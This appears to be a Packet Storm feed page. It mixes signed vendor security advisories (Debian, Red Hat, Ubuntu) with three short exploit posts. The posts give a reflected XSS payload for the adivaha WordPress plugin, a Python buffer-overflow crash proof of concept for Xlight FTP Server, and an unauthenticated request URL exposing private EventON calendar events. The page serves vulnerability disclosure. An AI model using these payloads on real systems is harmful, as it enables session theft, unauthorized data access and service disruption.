Debian Linux Security Advisory 5464-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, bypass of the same-origin policy, spoofing or sandbox bypass.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5464-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 03, 2023                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2023-4045 CVE-2023-4046 CVE-2023-4047 CVE-2023-4048                  CVE-2023-4049 CVE-2023-4050 CVE-2023-4055 CVE-2023-4056Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, bypass of the same-origin policy, spoofing or sandbox bypass.For the oldstable distribution (bullseye), these problems have been fixedin version 102.14.0esr-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 102.14.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTL4ygACgkQEMKTtsN8TjZ2nQ//YUyg2nEzvoHNRQHE9ezAxjfXUqkQjS7IEfavk7APQzLq4hvNcnkOab7u6vRimyFObl5o07byVlrDSUUENk7JivvX4HWd7h+CwJAb9Q+XE0qtHMovtbpwlut9nH/C5nUvtVHXok1A33fDvcYTqKX/5fb+v+LkJQudm7k1CIwqJxPyXkgJ8SHFuqBIB2s72mGrKM5Ha+woca17+eI8VhHQwXBgnVQRpxK5AeAUwDchez2Pd9xr6R6RBmziinRfzvo0CPtKp3WqFEDJHUCGx3k/mmlTbN9V4gQM/TZKi2Vr2qM+zvcEvWn684nKEHG6bm+u4EUytxAyFw0FsawsbL3ceJXYwPeddX1C2agW8bkfJgs1Eou33Dl+mu8svG/IrT08C/udNreiWQWIyELZvIZ8RJoKDyqZB6IOtkdDbkH1IzxaciTZRuJGgmj3rGWC02+W2tdoTN1p6GVLF5W0e6GvhYDjB+VVU2MWtqRaaE0l4v8vThHWQmfSHQKwdj8Wil62GumlC1h511SB1p1mQFHtSpBtuHWyZ4Nq3ZACiYfvJlDvq0y1nShE8Ek/CZvyrCm5vMPW1k8UYyNoRyfo239T5/iC9lYF+1A3NqrI3f5se60/lmc5e+TQ/FzG2CAOoVdi8EEdCpNkjyt3jkpZo4942ITTO2GZyzm1E6HQUTBY4do==Co4j-----END PGP SIGNATURE-----

Debian Security Advisory 5464-1

WordPress Adivaha Travel plugin version 2.3 suffers from a cross site scripting vulnerability.

    # Exploit Title: WordPress adivaha Travel Plugin 2.3 - Reflected XSS# Exploit Author: CraCkEr# Date: 29/07/2023# Vendor: adivaha - Travel Tech Company# Vendor Homepage: https://www.adivaha.com/# Software Link: https://wordpress.org/plugins/adiaha-hotel/# Demo: https://www.adivaha.com/demo/adivaha-online/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /mobile-app/v3/GET parameter 'isMobile' is vulnerable to XSShttps://www.website/mobile-app/v3/?pid=77A89299&isMobile=[XSS]XSS Payload: clq95"><script>alert(1)</script>lb1ra[-] Done

WordPress Adivaha Travel 2.3 Cross Site Scripting

Red Hat Security Advisory 2023-4475-01 - Gatekeeper is an open source project that applies the OPA Constraint Framework to enforce policies on your Kubernetes clusters. This advisory contains the container images for Gatekeeper that include bug fixes and container upgrades.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Gatekeeper Operator v0.2 security fixes and enhancements  
Advisory ID:       RHSA-2023:4475-01  
Product:           Red Hat ACM  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4475  
Issue date:        2023-08-03  
CVE Names:         CVE-2020-24736 CVE-2022-36227 CVE-2023-1667   
                   CVE-2023-2283 CVE-2023-3089 CVE-2023-26604   
                   CVE-2023-27535   
=====================================================================

1. Summary:

Gatekeeper Operator v0.2 security fixes and enhancements

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

2. Description:

Gatekeeper Operator v0.2

Gatekeeper is an open source project that applies the OPA Constraint  
Framework to enforce policies on your Kubernetes clusters.

This advisory contains the container images for Gatekeeper that include bug  
fixes and container upgrades.

Note: Gatekeeper support from the Red Hat support team is limited cases  
where it is integrated and used with Red Hat Advanced Cluster Management  
for Kubernetes. For support options for any other use, see the Gatekeeper  
open source project website at:  
https://open-policy-agent.github.io/gatekeeper/website/docs/howto/.

Security fix(es):

* CVE-2023-3089 openshift: OCP & FIPS mode

3. Solution:

IMPORTANT: This release removes `PodSecurityPolicy` resource references, a  
deprecated Kubernetes construct, from the operator. Gatekeeper constraints  
based on the resource may no longer work.

The Gatekeeper operator that is installed by the Gatekeeper operator policy  
has `installPlanApproval` set to `Automatic`. This setting means the  
operator is upgraded automatically when there is a new version of the  
operator. No further action is required for upgrade. If you changed the  
setting to `Manual`, then you must view each cluster to manually approve  
the upgrade to the operator.

4. Bugs fixed (https://bugzilla.redhat.com/):

2212085 - CVE-2023-3089 openshift: OCP & FIPS mode

5. References:

https://access.redhat.com/security/cve/CVE-2020-24736  
https://access.redhat.com/security/cve/CVE-2022-36227  
https://access.redhat.com/security/cve/CVE-2023-1667  
https://access.redhat.com/security/cve/CVE-2023-2283  
https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/cve/CVE-2023-26604  
https://access.redhat.com/security/cve/CVE-2023-27535  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-001

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkzAz/AAoJENzjgjWX9erEndsP/ifzKa5y3lM6GfDXmENg56du  
KQliejD5fDaVz+FJOcvzbqrSdjPV5yLsyM0G3CEWxYUvV0CXNnefkF9/cDzyXT4D  
kcGjGlJaM1SFg7eLI9T9rz5CLVwQi7Va/fBIxLhmDlW3gc7M2k2UmuGKHHQUFFuF  
uSSTMP4M3ygXComOEs2gLJkBA+PXkRRg+p0uS9+40fiPWZKIScjrDsous702uSGu  
ynITaReQJfegN7Thv6IAuZ7iJxIJKYTjYPOgU3Mj9p1jAR2a7MUWCYdxwmTnfmkV  
W1flnlAOVZcdRniOiLlj7bN3wnHFvNjyHbeWBCE205abg2EPZvjj9lPNCdkcPLSc  
OHcfIG+I22GMfkIwHCE+WsCRtpoBvERfn2fC5up+ghmI1nTqX1Bna7wGh9+KnHxk  
bQZvJxXZx+7S1HO/OUjqDwaTP0vHuFfPjwEzWuVNtbuUxJhhLurUInOSG9FEqxsy  
m7piV7q/GgXxIJnD/mt3izseINRtrm/2iz6UDipcpGi4TeaoPMhene2vv40k9tGA  
ezT2pyzsQnJVQesVHtWmNjNYzbpbAcYU5OO4Stt29l51uz1cbA+Rg8q8BM9MjpHT  
9ueMyZn47SJaGXZCLToHiJ1JbuDMcsErBH9lBnOsAehEImD2NTDMs01H+PFlFzAX  
8nDmKe1nqsDI7ca0SwEC  
=JlO4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4475-01

Ubuntu Security Notice 6273-1 - Jieyong Ma discovered that poppler incorrectly handled certain malformed PDF files. A remote attacker could possibly use this issue to cause poppler to crash, resulting in a denial of service. This issue only affected Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. It was discovered that poppler incorrectly handled certain malformed PDF files. A remote attacker could possibly use this issue to cause poppler to crash, resulting in a denial of service. This issue only affected Ubuntu 22.04 LTS and Ubuntu 23.04.

==========================================================================  
Ubuntu Security Notice USN-6273-1  
August 03, 2023

poppler vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

poppler could be made to crash if it opened a specially crafted file.

Software Description:  
- poppler: PDF rendering library

Details:

Jieyong Ma discovered that poppler incorrectly handled certain malformed  
PDF files. A remote attacker could possibly use this issue to cause poppler  
to crash, resulting in a denial of service. This issue only affected Ubuntu  
20.04 LTS and Ubuntu 22.04 LTS. (CVE-2022-27337)

It was discovered that poppler incorrectly handled certain malformed PDF  
files. A remote attacker could possibly use this issue to cause poppler to  
crash, resulting in a denial of service. This issue only affected Ubuntu  
22.04 LTS and Ubuntu 23.04. (CVE-2023-34872)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   libpoppler126                   22.12.0-2ubuntu1.1

Ubuntu 22.04 LTS:  
   libpoppler118                   22.02.0-2ubuntu0.2

Ubuntu 20.04 LTS:  
   libpoppler97                    0.86.1-0ubuntu1.2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6273-1  
   CVE-2022-27337, CVE-2023-34872

Package Information:  
   https://launchpad.net/ubuntu/+source/poppler/22.12.0-2ubuntu1.1  
   https://launchpad.net/ubuntu/+source/poppler/22.02.0-2ubuntu0.2  
   https://launchpad.net/ubuntu/+source/poppler/0.86.1-0ubuntu1.2

Ubuntu Security Notice USN-6273-1

Debian Linux Security Advisory 5465-1 - Seokchan Yoon discovered that missing sanitising in the email and URL validators of Django, a Python web development framework, could result in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5465-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 03, 2023                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : python-djangoCVE ID         : CVE-2023-36053Seokchan Yoon discovered that missing sanitising in the email and URLvalidators of Django, a Python web development framework, could resultin denial of service.For the oldstable distribution (bullseye), this problem has been fixedin version 2:2.2.28-1~deb11u2. This update also addresses CVE-2023-23969,CVE-2023-31047 and CVE-2023-24580.For the stable distribution (bookworm), this problem has been fixed inversion 3:3.2.19-1+deb12u1.We recommend that you upgrade your python-django packages.For the detailed security status of python-django please refer toits security tracker page at:https://security-tracker.debian.org/tracker/python-djangoFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTMEXoACgkQEMKTtsN8TjYgbA//QyvH70qUWpZtGBT19rQ8JQdcHCdh/FqlsosbYFwKwc+jZNfqyZWr45oMVKQvi8vggxPGXs9LfQb1LhWxsBzhNzCrvN24z7vSqWNensHVBA3NNaGkSDASsIXFZ/LvO0bMjdk0QQ5774CjhoixTBx5SmYy/oapTNeHrZv8geF+E5ga3+r2/lDLNZEfIFFMkfJRhoXuKS/cKKtfDnz37YDr0a8tAXDb/RbGvfu4igjDLWCMnq2aOmx2UaS2euvOlWknhv0r72Skp8ipLx5ykcEJ4WmD3LuNZbXZQNqbsYO9FX2yoXGJqwnuLvTHg/JCnYwrkUEDTcBAY8pbQ/MRM4yIYRxqEnQEyV8HIouajLgFKDtCJCG7Rii/axavcnBiNqgnp8Vg6/F0jKjJOEe4lnVl7xufAQcLTs2aUk9B2WlqKEpAF2xgPc1SdPXetdXy57N2R20Ft3jOS/s2V5YaButrGB0bKa7ktkpSez6Cr9FpNGSSP9G6sjoggRFcDSwHR9FIsX68cHE9DsCVE5J1PLAbJwqQiGl7s1ViDf1Ab4mMmdShPMOWB4mX57wxTcoAdxts6wgjotNwjEwOPEhYOSSAwxjGgeTvs3La4+nrjpFcq7Hg2Ot/FNBq0WsDst/oPfeZ/Lt/teUT36m5crWOovRMAAXKMSpg/KQ8L9b3HDrlwUE==ozYQ-----END PGP SIGNATURE-----

Debian Security Advisory 5465-1

Red Hat Security Advisory 2023-4471-01 - Red Hat OpenShift Serverless Client kn 1.29.1 provides a CLI to interact with Red Hat OpenShift Serverless 1.29.1. The kn CLI is delivered as an RPM package for installation on RHEL platforms, and as binaries for non-Linux platforms. This release includes security and bug fixes, and enhancements.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Release of OpenShift Serverless Client kn 1.29.1  
Advisory ID:       RHSA-2023:4471-01  
Product:           Red Hat OpenShift Serverless  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4471  
Issue date:        2023-08-03  
CVE Names:         CVE-2023-3089   
=====================================================================

1. Summary:

Red Hat OpenShift Serverless 1.29.1 is now available.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Openshift Serverless 1 on RHEL 8Base - ppc64le, s390x, x86_64

3. Description:

Red Hat OpenShift Serverless Client kn 1.29.1 provides a CLI to interact  
with Red Hat OpenShift Serverless 1.29.1. The kn CLI is delivered as an RPM  
package for installation on RHEL platforms, and as binaries for non-Linux  
platforms.

This release includes security and bug fixes, and enhancements.

Security Fix(es):

* openshift: OCP & FIPS mode (CVE-2023-3089)

For more information about CVE-2023-3089, see  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-001.

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgements, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For instructions on how to install and use OpenShift Serverless, see  
documentation linked from the References section.

5. Bugs fixed (https://bugzilla.redhat.com/):

2212085 - CVE-2023-3089 openshift: OCP & FIPS mode

6. Package List:

Openshift Serverless 1 on RHEL 8Base:

Source:  
openshift-serverless-clients-1.8.1-6.el8.src.rpm

ppc64le:  
openshift-serverless-clients-1.8.1-6.el8.ppc64le.rpm

s390x:  
openshift-serverless-clients-1.8.1-6.el8.s390x.rpm

x86_64:  
openshift-serverless-clients-1.8.1-6.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-001  
https://access.redhat.com/documentation/en-us/openshift_container_platform/4.10/html/serverless/index  
https://access.redhat.com/documentation/en-us/openshift_container_platform/4.11/html/serverless/index  
https://access.redhat.com/documentation/en-us/openshift_container_platform/4.12/html/serverless/index  
https://access.redhat.com/documentation/en-us/openshift_container_platform/4.13/html/serverless/index

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkzAxKAAoJENzjgjWX9erEO5cQAKhOGMfA3elNcWkiSUkqi95v  
leDH0tONGAVdgZoTnYW1hGXMqoDin1rwijHLVcD5DZt/VNPElvPzmrGmvRajgE7C  
QDZmz6Kg4SPj3mScJPrJogiNMFRnBuqiSPCtzvpKDE9n2gYz88lSOFzxHVEbuP6c  
6TEGzsz8ZDbPkmiSE+T4wpbDszn6gDOpwaJWTlgSqFXV68IoMCD+V9+5Nqg3dNVJ  
1NWf6OrrqFdBw5uIC2l6HSVuEdHVF8Udzq3LuEAOVL+/fAVqlz+X4KFJFLKgqmrB  
3+7r7zi3UJ77qKQBgd6ZMqUlt8bu9Vw3+5987wyjQBxqiHmhmosBw3wK4s/y3kBD  
qO3ShcCo5hYgCiebgfUZvUl2IFr0ZuzXoa0hMfdlmT+FFaNBvgvKA/8F0dLiKEuF  
30pBokKuOvRpYNHHaXnRLIK9NIZcVO5zBpO9rKLeitqZAh//6sVgSoEQnY8znGjq  
lRAdK82C5jXeQb5gHqN6v4+gbWp0C5g5IWQl7P4lzqnq/BmvAxhq/5SHpIfg2+P6  
K/7y+OSA+OGDcAROYK/tthJimXBjF7KAPvGG41F/XmhOMOUH2zXU/w+CBfgPWisz  
sS/UHG0i0lM/YTeS0RoSGa56fVfTzt4snysGYY6UGmjwJzZQR5VOfLLba6a7+nsS  
Y3VYSnzLk2qz++F29YcY  
=ojGB  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4471-01

Xlight FTP Server version 3.9.3.6 suffers from a stack buffer overflow vulnerability.

    # Exploit Title: Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)# Discovered by: Yehia Elghaly# Discovered Date: 2023-08-04# Vendor Homepage: https://www.xlightftpd.com/# Software Link : https://www.xlightftpd.com/download/setup.exe# Tested Version: 3.9.3.6# Vulnerability Type: Buffer Overflow Local# Tested on OS: Windows XP Professional SP3 - Windows 11 x64# Description: Xlight FTP Server 3.9.3.6 'Execute Program' Buffer Overflow (PoC)# Steps to reproduce:# 1. - Download and Xlight FTP Server# 2. - Run the python script and it will create exploit.txt file.# 3. - Open Xlight FTP Server 3.9.3.6# 4. - "File and Directory - Modify Virtual Server Configuration - Advanced - Misc- Setup # 6. - Execute a Program after use logged in-  Paste the characters # 7  - Crashed#!/usr/bin/env python3exploit = 'A' * 294try:     with open("exploit.txt","w") as file:        file.write(exploit)    print("POC is created")except:    print("POC not created")

Xlight FTP Server 3.9.3.6 Stack Buffer Overflow

Red Hat Security Advisory 2023-4472-01 - Version 1.29.1 of the OpenShift Serverless Operator is supported on Red Hat OpenShift Container Platform versions 4.10, 4.11, 4.12, and 4.13. This release includes security and bug fixes, and enhancements.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Release of OpenShift Serverless 1.29.1  
Advisory ID:       RHSA-2023:4472-01  
Product:           Red Hat OpenShift Serverless  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4472  
Issue date:        2023-08-03  
CVE Names:         CVE-2020-24736 CVE-2022-36227 CVE-2023-1667   
                   CVE-2023-2283 CVE-2023-3089 CVE-2023-22006   
                   CVE-2023-22036 CVE-2023-22041 CVE-2023-22044   
                   CVE-2023-22045 CVE-2023-22049 CVE-2023-24329   
                   CVE-2023-24539 CVE-2023-25193 CVE-2023-26604   
                   CVE-2023-27535 CVE-2023-29400   
=====================================================================

1. Summary:

Red Hat OpenShift Serverless version 1.29.1 is now available.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Version 1.29.1 of the OpenShift Serverless Operator is supported on Red Hat  
OpenShift Container Platform versions 4.10, 4.11, 4.12, and 4.13.

This release includes security and bug fixes, and enhancements.

Security Fix(es):

* openshift: OCP & FIPS mode (CVE-2023-3089)

* golang: html/template: improper sanitization of CSS values  
(CVE-2023-24539)

* golang: html/template: improper handling of empty HTML attributes  
(CVE-2023-29400)

For more information about CVE-2023-3089, see  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-001.

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgements, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2196026 - CVE-2023-24539 golang: html/template: improper sanitization of CSS values  
2196029 - CVE-2023-29400 golang: html/template: improper handling of empty HTML attributes  
2212085 - CVE-2023-3089 openshift: OCP & FIPS mode

5. References:

https://access.redhat.com/security/cve/CVE-2020-24736  
https://access.redhat.com/security/cve/CVE-2022-36227  
https://access.redhat.com/security/cve/CVE-2023-1667  
https://access.redhat.com/security/cve/CVE-2023-2283  
https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/cve/CVE-2023-22006  
https://access.redhat.com/security/cve/CVE-2023-22036  
https://access.redhat.com/security/cve/CVE-2023-22041  
https://access.redhat.com/security/cve/CVE-2023-22044  
https://access.redhat.com/security/cve/CVE-2023-22045  
https://access.redhat.com/security/cve/CVE-2023-22049  
https://access.redhat.com/security/cve/CVE-2023-24329  
https://access.redhat.com/security/cve/CVE-2023-24539  
https://access.redhat.com/security/cve/CVE-2023-25193  
https://access.redhat.com/security/cve/CVE-2023-26604  
https://access.redhat.com/security/cve/CVE-2023-27535  
https://access.redhat.com/security/cve/CVE-2023-29400  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-001  
https://access.redhat.com/documentation/en-us/openshift_container_platform/4.10/html/serverless/index  
https://access.redhat.com/documentation/en-us/openshift_container_platform/4.11/html/serverless/index  
https://access.redhat.com/documentation/en-us/openshift_container_platform/4.12/html/serverless/index  
https://access.redhat.com/documentation/en-us/openshift_container_platform/4.13/html/serverless/index

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkzAwUAAoJENzjgjWX9erES/UP/307ho5Lr+RAZQDG0xGUS4Qf  
2j+ZVHxV1ikAGgwBQTFmpHxRj8wvkdzwp6AcWfu8oAnTXtXi55tBmcogoZRAf90r  
f06I0L1hJvHQqQ6mL2u7ToaPMw2erF3+XwLVn8tn88E/yGmSfZfcvFSHE8Q4izXS  
0je1Hs1SUyLzCnXux60pyfFqhufK3td8ToqkYpp2lno+GSBHtbfbrlZqRBSJMOww  
yl63v1IAu6oGfT7/Z8Tyy1kEB8fmK33IHuW3l+iiqumvQGgMxPAM/BGMIOjnv1Zz  
h+maprr9+juQ4Z/IapkAUfHE0rWQ/gtXTe7L6ViQmFpRNaq1XAg+hD8HLs5fQZUj  
KN5uCHhvorDEro1/CrsyRug60d9WXgljDjguylmybqRPow1VNKMqsFu6UFyuLK3N  
/Qqf7JOybuOO4TRO28ugTpyydmy7JCj+UBwxvGqivkSiqx3wdlA+t+C7yc9o1Zxq  
GaiCtg0SCz5yDXpcmU12qHXpzjevjKmqwoULpK1tqR+B3Vg76BtFxb4UbFbria4f  
9zGbkPbYyIVSJXE5nEWMXlkANuiG5X4jn6Jy16d6U6485MAppICv7VgvEmI7O93L  
O5Q1SgtKFo5jSYV9nKga/EAiJuh+YK9XGaQnia7k7of2R/vWuG8SJ7cn+MyBKMvQ  
nNu7xh1i1gcNXRN0afB6  
=lZHO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4472-01

Ubuntu Security Notice 5064-3 - USN-5064-1 fixed a vulnerability in GNU. This update provides the corresponding update for Ubuntu 14.04 LTS. Maverick Chung and Qiaoyi Fang discovered that cpio incorrectly handled certain pattern files. A remote attacker could use this issue to cause cpio to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5064-3August 03, 2023cpio vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 14.04 LTS (Available with Ubuntu Pro)Summary:GNU cpio could be made to crash or run programs if it opened a speciallycrafted file.Software Description:- cpio: a tool to manage archives of filesDetails:USN-5064-1 fixed a vulnerability in GNU. This update providesthe corresponding update for Ubuntu 14.04 LTS.Original advisory details: Maverick Chung and Qiaoyi Fang discovered that cpio incorrectly handled certain pattern files. A remote attacker could use this issue to cause cpio to crash, resulting in a denial of service, or possibly execute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 14.04 LTS (Available with Ubuntu Pro):  cpio                            2.11+dfsg-1ubuntu1.2+esm2In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5064-3  https://ubuntu.com/security/notices/USN-5064-1  CVE-2021-38185

Ubuntu Security Notice USN-5064-3

WordPress EventON Calendar plugin version 4.4 suffers from an insecure direct object reference vulnerability.

    # Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access# Date: 03.08.2023# Exploit Author: Miguel Santareno# Vendor Homepage: https://www.myeventon.com/# Version: 4.4# Tested on: Google and Firefox latest version# CVE : CVE-2023-2796# 1. DescriptionThe plugin lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.# 2. Proof of Concept (PoC)Proof of Concept:https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=value

Source

Packet Storm